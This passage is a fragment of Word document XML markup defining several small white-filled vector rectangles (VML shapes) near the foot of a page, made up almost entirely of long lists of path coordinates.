197,2548,15197,2546,15197,2545,15197,2544,15197,2543,15197,2541,15197,2540,15197,2539,15197,2537,15197,2536,15197,2535,15197,2533,15197,2532,15197,2530,15197,2528,15197,2527,15197,2525,15197,2523,15197,2522,15197,2520,15197,2518,15197,2516,15197,2514,15197,2512,15197,2510,15197,2508,15197,2506,15197,2504,15197,2502,15197,2500,15197,2497,15197,2495,15197,2493,15197,2490,15197,2488,15197,2486,15197,2483,15197,2480,15197,2478,15197,2475,15197,2472,15197,2470,15197,2467,15197,2464,15197,2461,15197,2458,15197,2455,15197,2455,15197,2455,15197,2455,15197,2455,15197,2455,15197,2455,15197,2455,15197,2455,15197,2455,15197,2455,15197,2455,15197,2455,15196,2455,15196,2455,15196,2455,15196,2455,15196,2455,15196,2455,15196,2455,15196,2455,15196,2455,15195,2455,15195,2455,15195,2455,15195,2455,15195,2455,15194,2455,15194,2455,15194,2455,15193,2455,15193,2455,15193,2455,15192,2455,15192,2455,15191,2455,15191,2455,15190,2455,15190,2455,15189,2455,15188,2455,15188,2455,15187,2455,15186,2455,15185,2455,15185,2455,15184,2455,15183,2455,15182,2455,15181,2455,15180,2455,15179,2455,15178,2455,15177,2455,15175,2455,15174,2455,15173,2455,15171,2455,15170,2455,15169,2455,15167,2455,15166,2455,15164,2455,15162,2455,15161,2455,15159,2455,15157,2455,15155,2455,15153,2455,15151,2455,15149,2455,15147,2455,15145,2455,15142,2455,15140,2455,15138,2455,15135,2455,15133,2455,15130,2455,15128,2455,15125,2455,15122,2455,15119,2455,15116,2455,15113,2455,15110,2455,15107,2455,15104,2455,15100,2455,15097,2455,15093,2455,15090,2455,15086,2455,15083,2455,15079,2455,15075,2455,15071,2455,15067,2455,15063,2455,15058,2455,15054,2455,15050,2455,15045,2455,15041,2455,15036,2455,15031,2455,15026,2455,15021,2455,15016,2455,15011,2455,15006,2455,15001,2455,14995,2455,14990,2455,14984,2455,14978,2455,14972,2455,14966,2455,14960,2455,14954,2455,14948,2455,14942e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:139.500pt;margin-top:746.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2790,14930" coordsize="130,250">
        <v:shape style="position:absolute;left:2790;top:14930;width:130;height:250" coordorigin="2790,14930" coordsize="130,250" path="m2815,14942l2815,14942,2815,14942,2815,14942,2815,14942,2815,14942,2815,14942,2815,14942,2815,14942,2815,14942,2815,14942,2815,14942,2816,14942,2816,14942,2816,14942,2816,14942,2816,14942,2816,14942,2816,14942,2816,14942,2816,14942,2816,14942,2816,14942,2816,14942,2816,14942,2816,14942,2817,14942,2817,14942,2817,14942,2817,14942,2817,14942,2817,14942,2818,14942,2818,14942,2818,14942,2818,14942,2818,14942,2819,14942,2819,14942,2819,14942,2820,14942,2820,14942,2820,14942,2821,14942,2821,14942,2821,14942,2822,14942,2822,14942,2823,14942,2823,14942,2824,14942,2824,14942,2825,14942,2825,14942,2826,14942,2827,14942,2827,14942,2828,14942,2829,14942,2829,14942,2830,14942,2831,14942,2832,14942,2832,14942,2833,14942,2834,14942,2835,14942,2836,14942,2837,14942,2838,14942,2839,14942,2840,14942,2841,14942,2842,14942,2843,14942,2844,14942,2845,14942,2847,14942,2848,14942,2849,14942,2851,14942,2852,14942,2853,14942,2855,14942,2856,14942,2858,14942,2859,14942,2861,14942,2862,14942,2864,14942,2866,14942,2867,14942,2869,14942,2871,14942,2873,14942,2875,14942,2877,14942,2878,14942,2880,14942,2882,14942,2885,14942,2887,14942,2889,14942,2891,14942,2893,14942,2896,14942,2898,14942,2900,14942,2903,14942,2905,14942,2908,14942,2910,14942,2913,14942,2916,14942,2918,14942,2921,14942,2924,14942,2927,14942,2930,14942,2932,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14942,2935,14943,2935,14943,2935,14943,2935,14943,2935,14943,2935,14944,2935,14944,2935,14944,2935,14945,2935,14945,2935,14945,2935,14946,2935,14946,2935,14946,2935,14947,2935,14947,2935,14948,2935,14949,2935,14949,2935,14950,2935,14951,2935,14951,2935,14952,2935,14953,2935,14954,2935,14954,2935,14955,2935,14956,2935,14957,2935,14958,2935,14959,2935,14960,2935,14962,2935,14963,2935,14964,2935,14965,2935,14967,2935,14968,2935,14970,2935,14971,2935,14973,2935,14974,2935,14976,2935,14978,2935,14979,2935,14981,2935,14983,2935,14985,2935,14987,2935,14989,2935,14991,2935,14993,2935,14996,2935,14998,2935,15000,2935,15003,2935,15005,2935,15008,2935,15011,2935,15013,2935,15016,2935,15019,2935,15022,2935,15025,2935,15028,2935,15031,2935,15035,2935,15038,2935,15041,2935,15045,2935,15048,2935,15052,2935,15056,2935,15059,2935,15063,2935,15067,2935,15071,2935,15075,2935,15080,2935,15084,2935,15088,2935,15093,2935,15098,2935,15102,2935,15107,2935,15112,2935,15117,2935,15122,2935,15127,2935,15132,2935,15138,2935,15143,2935,15149,2935,15154,2935,15160,2935,15166,2935,15172,2935,15178,2935,15184,2935,15190,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2935,15197,2934,15197,2934,15197,2934,15197,2934,15197,2934,15197,2934,15197,2934,15197,2933,15197,2933,15197,2933,15197,2933,15197,2932,15197,2932,15197,2932,15197,2932,15197,2931,15197,2931,15197,2931,15197,2930,15197,2930,15197,2929,15197,2929,15197,2929,15197,2928,15197,2928,15197,2927,15197,2927,15197,2926,15197,2925,15197,2925,15197,2924,15197,2924,15197,2923,15197,2922,15197,2922,15197,2921,15197,2920,15197,2919,15197,2918,15197,2918,15197,2917,15197,2916,15197,2915,15197,2914,15197,2913,15197,2912,15197,2911,15197,2910,15197,2909,15197,2908,15197,2907,15197,2905,15197,2904,15197,2903,15197,2902,15197,2900,15197,2899,15197,2898,15197,2896,15197,2895,15197,2893,15197,2892,15197,2890,15197,2889,15197,2887,15197,2885,15197,2884,15197,2882,15197,2880,15197,2878,15197,2876,15197,2874,15197,2872,15197,2870,15197,2868,15197,2866,15197,2864,15197,2862,15197,2860,15197,2858,15197,2855,15197,2853,15197,2851,15197,2848,15197,2846,15197,2843,15197,2841,15197,2838,15197,2835,15197,2833,15197,2830,15197,2827,15197,2824,15197,2821,15197,2818,15197,2815,15197,2815,15197,2815,15197,2815,15197,2815,15197,2815,15197,2815,15197,2815,15197,2815,15197,2815,15197,2815,15197,2815,15197,2815,15196,2815,15196,2815,15196,2815,15196,2815,15196,2815,15196,2815,15196,2815,15196,2815,15196,2815,15195,2815,15195,2815,15195,2815,15195,2815,15195,2815,15194,2815,15194,2815,15194,2815,15193,2815,15193,2815,15193,2815,15192,2815,15192,2815,15191,2815,15191,2815,15190,2815,15190,2815,15189,2815,15188,2815,15188,2815,15187,2815,15186,2815,15185,2815,15185,2815,15184,2815,15183,2815,15182,2815,15181,2815,15180,2815,15179,2815,15178,2815,15177,2815,15175,2815,15174,2815,15173,2815,15171,2815,15170,2815,15169,2815,15167,2815,15166,2815,15164,2815,15162,2815,15161,2815,15159,2815,15157,2815,15155,2815,15153,2815,15151,2815,15149,2815,15147,2815,15145,2815,15142,2815,15140,2815,15138,2815,15135,2815,15133,2815,15130,2815,15128,2815,15125,2815,15122,2815,15119,2815,15116,2815,15113,2815,15110,2815,15107,2815,15104,2815,15100,2815,15097,2815,15093,2815,15090,2815,15086,2815,15083,2815,15079,2815,15075,2815,15071,2815,15067,2815,15063,2815,15058,2815,15054,2815,15050,2815,15045,2815,15041,2815,15036,2815,15031,2815,15026,2815,15021,2815,15016,2815,15011,2815,15006,2815,15001,2815,14995,2815,14990,2815,14984,2815,14978,2815,14972,2815,14966,2815,14960,2815,14954,2815,14948,2815,14942e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:199.500pt;margin-top:746.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="3990,14930" coordsize="130,250">
        <v:shape style="position:absolute;left:3990;top:14930;width:130;height:250" coordorigin="3990,14930" coordsize="130,250" path="m4016,14942l4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4016,14942,4017,14942,4017,14942,4017,14942,4017,14942,4017,14942,4017,14942,4017,14942,4017,14942,4017,14942,4018,14942,4018,14942,4018,14942,4018,14942,4018,14942,4019,14942,4019,14942,4019,14942,4019,14942,4020,14942,4020,14942,4020,14942,4021,14942,4021,14942,4021,14942,4022,14942,4022,14942,4023,14942,4023,14942,4023,14942,4024,14942,4024,14942,4025,14942,4025,14942,4026,14942,4027,14942,4027,14942,4028,14942,4029,14942,4029,14942,4030,14942,4031,14942,4031,14942,4032,14942,4033,14942,4034,14942,4035,14942,4036,14942,4037,14942,4037,14942,4038,14942,4039,14942,4040,14942,4042,14942,4043,14942,4044,14942,4045,14942,4046,14942,4047,14942,4049,14942,4050,14942,4051,14942,4053,14942,4054,14942,4055,14942,4057,14942,4058,14942,4060,14942,4061,14942,4063,14942,4065,14942,4066,14942,4068,14942,4070,14942,4072,14942,4073,14942,4075,14942,4077,14942,4079,14942,4081,14942,4083,14942,4085,14942,4087,14942,4089,14942,4092,14942,4094,14942,4096,14942,4098,14942,4101,14942,4103,14942,4106,14942,4108,14942,4111,14942,4113,14942,4116,14942,4119,14942,4122,14942,4124,14942,4127,14942,4130,14942,4133,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14942,4136,14943,4136,14943,4136,14943,4136,14943,4136,14943,4136,14944,4136,14944,4136,14944,4136,14945,4136,14945,4136,14945,4136,14946,4136,14946,4136,14946,4136,14947,4136,14947,4136,14948,4136,14949,4136,14949,4136,14950,4136,14951,4136,14951,4136,14952,4136,14953,4136,14954,4136,14954,4136,14955,4136,14956,4136,14957,4136,14958,4136,14959,4136,14960,4136,14962,4136,14963,4136,14964,4136,14965,4136,14967,4136,14968,4136,14970,4136,14971,4136,14973,4136,14974,4136,14976,4136,14978,4136,14979,4136,14981,4136,14983,4136,14985,4136,14987,4136,14989,4136,14991,4136,14993,4136,14996,4136,14998,4136,15000,4136,15003,4136,15005,4136,15008,4136,15011,4136,15013,4136,15016,4136,15019,4136,15022,4136,15025,4136,15028,4136,15031,4136,15035,4136,15038,4136,15041,4136,15045,4136,15048,4136,15052,4136,15056,4136,15059,4136,15063,4136,15067,4136,15071,4136,15075,4136,15080,4136,15084,4136,15088,4136,15093,4136,15098,4136,15102,4136,15107,4136,15112,4136,15117,4136,15122,4136,15127,4136,15132,4136,15138,4136,15143,4136,15149,4136,15154,4136,15160,4136,15166,4136,15172,4136,15178,4136,15184,4136,15190,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4136,15197,4135,15197,4135,15197,4135,15197,4135,15197,4135,15197,4135,15197,4135,15197,4135,15197,4134,15197,4134,15197,4134,15197,4134,15197,4134,15197,4133,15197,4133,15197,4133,15197,4132,15197,4132,15197,4132,15197,4132,15197,4131,15197,4131,15197,4130,15197,4130,15197,4130,15197,4129,15197,4129,15197,4128,15197,4128,15197,4127,15197,4127,15197,4126,15197,4125,15197,4125,15197,4124,15197,4124,15197,4123,15197,4122,15197,4121,15197,4121,15197,4120,15197,4119,15197,4118,15197,4117,15197,4117,15197,4116,15197,4115,15197,4114,15197,4113,15197,4112,15197,4111,15197,4109,15197,4108,15197,4107,15197,4106,15197,4105,15197,4104,15197,4102,15197,4101,15197,4100,15197,4098,15197,4097,15197,4095,15197,4094,15197,4092,15197,4091,15197,4089,15197,4088,15197,4086,15197,4084,15197,4082,15197,4081,15197,4079,15197,4077,15197,4075,15197,4073,15197,4071,15197,4069,15197,4067,15197,4065,15197,4063,15197,4060,15197,4058,15197,4056,15197,4054,15197,4051,15197,4049,15197,4046,15197,4044,15197,4041,15197,4039,15197,4036,15197,4033,15197,4031,15197,4028,15197,4025,15197,4022,15197,4019,15197,4016,15197,4016,15197,4016,15197,4016,15197,4016,15197,4016,15197,4016,15197,4016,15197,4016,15197,4016,15197,4016,15197,4016,15197,4016,15196,4016,15196,4016,15196,4016,15196,4016,15196,4016,15196,4016,15196,4016,15196,4016,15196,4016,15195,4016,15195,4016,15195,4016,15195,4016,15195,4016,15194,4016,15194,4016,15194,4016,15193,4016,15193,4016,15193,4016,15192,4016,15192,4016,15191,4016,15191,4016,15190,4016,15190,4016,15189,4016,15188,4016,15188,4016,15187,4016,15186,4016,15185,4016,15185,4016,15184,4016,15183,4016,15182,4016,15181,4016,15180,4016,15179,4016,15178,4016,15177,4016,15175,4016,15174,4016,15173,4016,15171,4016,15170,4016,15169,4016,15167,4016,15166,4016,15164,4016,15162,4016,15161,4016,15159,4016,15157,4016,15155,4016,15153,4016,15151,4016,15149,4016,15147,4016,15145,4016,15142,4016,15140,4016,15138,4016,15135,4016,15133,4016,15130,4016,15128,4016,15125,4016,15122,4016,15119,4016,15116,4016,15113,4016,15110,4016,15107,4016,15104,4016,15100,4016,15097,4016,15093,4016,15090,4016,15086,4016,15083,4016,15079,4016,15075,4016,15071,4016,15067,4016,15063,4016,15058,4016,15054,4016,15050,4016,15045,4016,15041,4016,15036,4016,15031,4016,15026,4016,15021,4016,15016,4016,15011,4016,15006,4016,15001,4016,14995,4016,14990,4016,14984,4016,14978,4016,14972,4016,14966,4016,14960,4016,14954,4016,14948,4016,14942e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:223.500pt;margin-top:746.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4470,14930" coordsize="130,250">
        <v:shape style="position:absolute;left:4470;top:14930;width:130;height:250" coordorigin="4470,14930" coordsize="130,250" path="m4496,14942l4496,14942,4496,14942,4496,14942,4496,14942,4496,14942,4496,14942,4496,14942,4496,14942,4496,14942,4496,14942,4496,14942,4496,14942,4496,14942,4496,14942,4496,14942,4497,14942,4497,14942,4497,14942,4497,14942,4497,14942,4497,14942,4497,14942,4497,14942,4497,14942,4497,14942,4497,14942,4498,14942,4498,14942,4498,14942,4498,14942,4498,14942,4498,14942,4499,14942,4499,14942,4499,14942,4499,14942,4500,14942,4500,14942,4500,14942,4500,14942,4501,14942,4501,14942,4502,14942,4502,14942,4502,14942,4503,14942,4503,14942,4504,14942,4504,14942,4505,14942,4505,14942,4506,14942,4506,14942,4507,14942,4507,14942,4508,14942,4509,14942,4509,14942,4510,14942,4511,14942,4512,14942,4512,14942,4513,14942,4514,14942,4515,14942,4516,14942,4517,14942,4518,14942,4519,14942,4520,14942,4521,14942,4522,14942,4523,14942,4524,14942,4525,14942,4526,14942,4528,14942,4529,14942,4530,14942,4531,14942,4533,14942,4534,14942,4536,14942,4537,14942,4538,14942,4540,14942,4542,14942,4543,14942,4545,14942,4546,14942,4548,14942,4550,14942,4552,14942,4554,14942,4555,14942,4557,14942,4559,14942,4561,14942,4563,14942,4565,14942,4568,14942,4570,14942,4572,14942,4574,14942,4576,14942,4579,14942,4581,14942,4584,14942,4586,14942,4589,14942,4591,14942,4594,14942,4596,14942,4599,14942,4602,14942,4605,14942,4607,14942,4610,14942,4613,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14942,4616,14943,4616,14943,4616,14943,4616,14943,4616,14943,4616,14944,4616,14944,4616,14944,4616,14945,4616,14945,4616,14945,4616,14946,4616,14946,4616,14946,4616,14947,4616,14947,4616,14948,4616,14949,4616,14949,4616,14950,4616,14951,4616,14951,4616,14952,4616,14953,4616,14954,4616,14954,4616,14955,4616,14956,4616,14957,4616,14958,4616,14959,4616,14960,4616,14962,4616,14963,4616,14964,4616,14965,4616,14967,4616,14968,4616,14970,4616,14971,4616,14973,4616,14974,4616,14976,4616,14978,4616,14979,4616,14981,4616,14983,4616,14985,4616,14987,4616,14989,4616,14991,4616,14993,4616,14996,4616,14998,4616,15000,4616,15003,4616,15005,4616,15008,4616,15011,4616,15013,4616,15016,4616,15019,4616,15022,4616,15025,4616,15028,4616,15031,4616,15035,4616,15038,4616,15041,4616,15045,4616,15048,4616,15052,4616,15056,4616,15059,4616,15063,4616,15067,4616,15071,4616,15075,4616,15080,4616,15084,4616,15088,4616,15093,4616,15098,4616,15102,4616,15107,4616,15112,4616,15117,4616,15122,4616,15127,4616,15132,4616,15138,4616,15143,4616,15149,4616,15154,4616,15160,4616,15166,4616,15172,4616,15178,4616,15184,4616,15190,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4616,15197,4615,15197,4615,15197,4615,15197,4615,15197,4615,15197,4615,15197,4615,15197,4614,15197,4614,15197,4614,15197,4614,15197,4614,15197,4613,15197,4613,15197,4613,15197,4612,15197,4612,15197,4612,15197,4611,15197,4611,15197,4611,15197,4610,15197,4610,15197,4609,15197,4609,15197,4608,15197,4608,15197,4607,15197,4607,15197,4606,15197,4606,15197,4605,15197,4604,15197,4604,15197,4603,15197,4602,15197,4602,15197,4601,15197,4600,15197,4599,15197,4599,15197,4598,15197,4597,15197,4596,15197,4595,15197,4594,15197,4593,15197,4592,15197,4591,15197,4590,15197,4589,15197,4587,15197,4586,15197,4585,15197,4584,15197,4583,15197,4581,15197,4580,15197,4578,15197,4577,15197,4576,15197,4574,15197,4573,15197,4571,15197,4569,15197,4568,15197,4566,15197,4564,15197,4563,15197,4561,15197,4559,15197,4557,15197,4555,15197,4553,15197,4551,15197,4549,15197,4547,15197,4545,15197,4543,15197,4541,15197,4538,15197,4536,15197,4534,15197,4531,15197,4529,15197,4527,15197,4524,15197,4521,15197,4519,15197,4516,15197,4514,15197,4511,15197,4508,15197,4505,15197,4502,15197,4499,15197,4496,15197,4496,15197,4496,15197,4496,15197,4496,15197,4496,15197,4496,15197,4496,15197,4496,15197,4496,15197,4496,15197,4496,15197,4496,15196,4496,15196,4496,15196,4496,15196,4496,15196,4496,15196,4496,15196,4496,15196,4496,15196,4496,15195,4496,15195,4496,15195,4496,15195,4496,15195,4496,15194,4496,15194,4496,15194,4496,15193,4496,15193,4496,15193,4496,15192,4496,15192,4496,15191,4496,15191,4496,15190,4496,15190,4496,15189,4496,15188,4496,15188,4496,15187,4496,15186,4496,15185,4496,15185,4496,15184,4496,15183,4496,15182,4496,15181,4496,15180,4496,15179,4496,15178,4496,15177,4496,15175,4496,15174,4496,15173,4496,15171,4496,15170,4496,15169,4496,15167,4496,15166,4496,15164,4496,15162,4496,15161,4496,15159,4496,15157,4496,15155,4496,15153,4496,15151,4496,15149,4496,15147,4496,15145,4496,15142,4496,15140,4496,15138,4496,15135,4496,15133,4496,15130,4496,15128,4496,15125,4496,15122,4496,15119,4496,15116,4496,15113,4496,15110,4496,15107,4496,15104,4496,15100,4496,15097,4496,15093,4496,15090,4496,15086,4496,15083,4496,15079,4496,15075,4496,15071,4496,15067,4496,15063,4496,15058,4496,15054,4496,15050,4496,15045,4496,15041,4496,15036,4496,15031,4496,15026,4496,15021,4496,15016,4496,15011,4496,15006,4496,15001,4496,14995,4496,14990,4496,14984,4496,14978,4496,14972,4496,14966,4496,14960,4496,14954,4496,14948,4496,14942e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:126.500pt;margin-top:764.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2530,15290" coordsize="130,270">
        <v:shape style="position:absolute;left:2530;top:15290;width:130;height:270" coordorigin="2530,15290" coordsize="130,270" path="m2545,15317l2545,15317,2545,15317,2545,15317,2545,15317,2545,15317,2545,15317,2545,15317,2545,15317,2545,15317,2545,15317,2545,15317,2545,15317,2545,15317,2545,15317,2545,15317,2546,15317,2546,15317,2546,15317,2546,15317,2546,15317,2546,15317,2546,15317,2546,15317,2546,15317,2546,15317,2546,15317,2547,15317,2547,15317,2547,15317,2547,15317,2547,15317,2547,15317,2548,15317,2548,15317,2548,15317,2548,15317,2549,15317,2549,15317,2549,15317,2550,15317,2550,15317,2550,15317,2551,15317,2551,15317,2551,15317,2552,15317,2552,15317,2553,15317,2553,15317,2554,15317,2554,15317,2555,15317,2555,15317,2556,15317,2556,15317,2557,15317,2558,15317,2558,15317,2559,15317,2560,15317,2561,15317,2561,15317,2562,15317,2563,15317,2564,15317,2565,15317,2566,15317,2567,15317,2568,15317,2569,15317,2570,15317,2571,15317,2572,15317,2573,15317,2574,15317,2575,15317,2577,15317,2578,15317,2579,15317,2580,15317,2582,15317,2583,15317,2585,15317,2586,15317,2588,15317,2589,15317,2591,15317,2592,15317,2594,15317,2596,15317,2597,15317,2599,15317,2601,15317,2603,15317,2604,15317,2606,15317,2608,15317,2610,15317,2612,15317,2614,15317,2617,15317,2619,15317,2621,15317,2623,15317,2625,15317,2628,15317,2630,15317,2633,15317,2635,15317,2638,15317,2640,15317,2643,15317,2645,15317,2648,15317,2651,15317,2654,15317,2656,15317,2659,15317,2662,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15317,2665,15318,2665,15318,2665,15318,2665,15318,2665,15318,2665,15319,2665,15319,2665,15319,2665,15319,2665,15320,2665,15320,2665,15320,2665,15321,2665,15321,2665,15322,2665,15322,2665,15323,2665,15323,2665,15324,2665,15324,2665,15325,2665,15326,2665,15326,2665,15327,2665,15328,2665,15329,2665,15330,2665,15331,2665,15331,2665,15332,2665,15333,2665,15335,2665,15336,2665,15337,2665,15338,2665,15339,2665,15341,2665,15342,2665,15343,2665,15345,2665,15346,2665,15348,2665,15349,2665,15351,2665,15353,2665,15355,2665,15356,2665,15358,2665,15360,2665,15362,2665,15364,2665,15366,2665,15369,2665,15371,2665,15373,2665,15376,2665,15378,2665,15381,2665,15383,2665,15386,2665,15389,2665,15391,2665,15394,2665,15397,2665,15400,2665,15403,2665,15406,2665,15410,2665,15413,2665,15416,2665,15420,2665,15423,2665,15427,2665,15431,2665,15435,2665,15438,2665,15442,2665,15447,2665,15451,2665,15455,2665,15459,2665,15464,2665,15468,2665,15473,2665,15477,2665,15482,2665,15487,2665,15492,2665,15497,2665,15502,2665,15507,2665,15513,2665,15518,2665,15524,2665,15529,2665,15535,2665,15541,2665,15547,2665,15553,2665,15559,2665,15565,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2665,15572,2664,15572,2664,15572,2664,15572,2664,15572,2664,15572,2664,15572,2664,15572,2663,15572,2663,15572,2663,15572,2663,15572,2663,15572,2662,15572,2662,15572,2662,15572,2661,15572,2661,15572,2661,15572,2660,15572,2660,15572,2660,15572,2659,15572,2659,15572,2658,15572,2658,15572,2657,15572,2657,15572,2656,15572,2656,15572,2655,15572,2655,15572,2654,15572,2653,15572,2653,15572,2652,15572,2651,15572,2651,15572,2650,15572,2649,15572,2648,15572,2648,15572,2647,15572,2646,15572,2645,15572,2644,15572,2643,15572,2642,15572,2641,15572,2640,15572,2639,15572,2638,15572,2636,15572,2635,15572,2634,15572,2633,15572,2632,15572,2630,15572,2629,15572,2627,15572,2626,15572,2625,15572,2623,15572,2622,15572,2620,15572,2618,15572,2617,15572,2615,15572,2613,15572,2612,15572,2610,15572,2608,15572,2606,15572,2604,15572,2602,15572,2600,15572,2598,15572,2596,15572,2594,15572,2592,15572,2590,15572,2587,15572,2585,15572,2583,15572,2580,15572,2578,15572,2576,15572,2573,15572,2571,15572,2568,15572,2565,15572,2563,15572,2560,15572,2557,15572,2554,15572,2551,15572,2548,15572,2545,15572,2545,15572,2545,15572,2545,15572,2545,15572,2545,15572,2545,15572,2545,15572,2545,15572,2545,15572,2545,15572,2545,15572,2545,15572,2545,15572,2545,15572,2545,15571,2545,15571,2545,15571,2545,15571,2545,15571,2545,15571,2545,15571,2545,15570,2545,15570,2545,15570,2545,15570,2545,15569,2545,15569,2545,15569,2545,15569,2545,15568,2545,15568,2545,15567,2545,15567,2545,15566,2545,15566,2545,15565,2545,15565,2545,15564,2545,15564,2545,15563,2545,15562,2545,15561,2545,15561,2545,15560,2545,15559,2545,15558,2545,15557,2545,15556,2545,15555,2545,15554,2545,15553,2545,15552,2545,15551,2545,15549,2545,15548,2545,15547,2545,15545,2545,15544,2545,15542,2545,15541,2545,15539,2545,15537,2545,15536,2545,15534,2545,15532,2545,15530,2545,15528,2545,15526,2545,15524,2545,15522,2545,15520,2545,15518,2545,15515,2545,15513,2545,15510,2545,15508,2545,15505,2545,15503,2545,15500,2545,15497,2545,15494,2545,15491,2545,15488,2545,15485,2545,15482,2545,15479,2545,15476,2545,15472,2545,15469,2545,15465,2545,15461,2545,15458,2545,15454,2545,15450,2545,15446,2545,15442,2545,15438,2545,15434,2545,15429,2545,15425,2545,15420,2545,15416,2545,15411,2545,15406,2545,15402,2545,15397,2545,15392,2545,15386,2545,15381,2545,15376,2545,15370,2545,15365,2545,15359,2545,15353,2545,15348,2545,15342,2545,15336,2545,15329,2545,15323,2545,15317e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:144.500pt;margin-top:764.500pt;width:6.500pt;height:13.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="2890,15290" coordsize="130,270">
        <v:shape style="position:absolute;left:2890;top:15290;width:130;height:270" coordorigin="2890,15290" coordsize="130,270" path="m2905,15317l2905,15317,2905,15317,2905,15317,2905,15317,2905,15317,2905,15317,2905,15317,2905,15317,2905,15317,2906,15317,2906,15317,2906,15317,2906,15317,2906,15317,2906,15317,2906,15317,2906,15317,2906,15317,2906,15317,2906,15317,2906,15317,2906,15317,2906,15317,2906,15317,2906,15317,2907,15317,2907,15317,2907,15317,2907,15317,2907,15317,2907,15317,2908,15317,2908,15317,2908,15317,2908,15317,2909,15317,2909,15317,2909,15317,2909,15317,2910,15317,2910,15317,2910,15317,2911,15317,2911,15317,2912,15317,2912,15317,2912,15317,2913,15317,2913,15317,2914,15317,2914,15317,2915,15317,2915,15317,2916,15317,2917,15317,2917,15317,2918,15317,2919,15317,2919,15317,2920,15317,2921,15317,2922,15317,2922,15317,2923,15317,2924,15317,2925,15317,2926,15317,2927,15317,2928,15317,2929,15317,2930,15317,2931,15317,2932,15317,2933,15317,2934,15317,2936,15317,2937,15317,2938,15317,2939,15317,2941,15317,2942,15317,2943,15317,2945,15317,2946,15317,2948,15317,2949,15317,2951,15317,2952,15317,2954,15317,2956,15317,2957,15317,2959,15317,2961,15317,2963,15317,2965,15317,2967,15317,2968,15317,2970,15317,2973,15317,2975,15317,2977,15317,2979,15317,2981,15317,2983,15317,2986,15317,2988,15317,2990,15317,2993,15317,2995,15317,2998,15317,3000,15317,3003,15317,3006,15317,3008,15317,3011,15317,3014,15317,3017,15317,3020,15317,3023,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15317,3026,15318,3026,15318,3026,15318,3026,15318,3026,15318,3026,15319,3026,15319,3026,15319,3026,15319,3026,15320,3026,15320,3026,15320,3026,15321,3026,15321,3026,15322,3026,15322,3026,15323,3026,15323,3026,15324,3026,15324,3026,15325,3026,15326,3026,15326,3026,15327,3026,15328,3026,15329,3026,15330,3026,15331,3026,15331,3026,15332,3026,15333,3026,15335,3026,15336,3026,15337,3026,15338,3026,15339,3026,15341,3026,15342,3026,15343,3026,15345,3026,15346,3026,15348,3026,15349,3026,15351,3026,15353,3026,15355,3026,15356,3026,15358,3026,15360,3026,15362,3026,15364,3026,15366,3026,15369,3026,15371,3026,15373,3026,15376,3026,15378,3026,15381,3026,15383,3026,15386,3026,15389,3026,15391,3026,15394,3026,15397,3026,15400,3026,15403,3026,15406,3026,15410,3026,15413,3026,15416,3026,15420,3026,15423,3026,15427,3026,15431,3026,15435,3026,15438,3026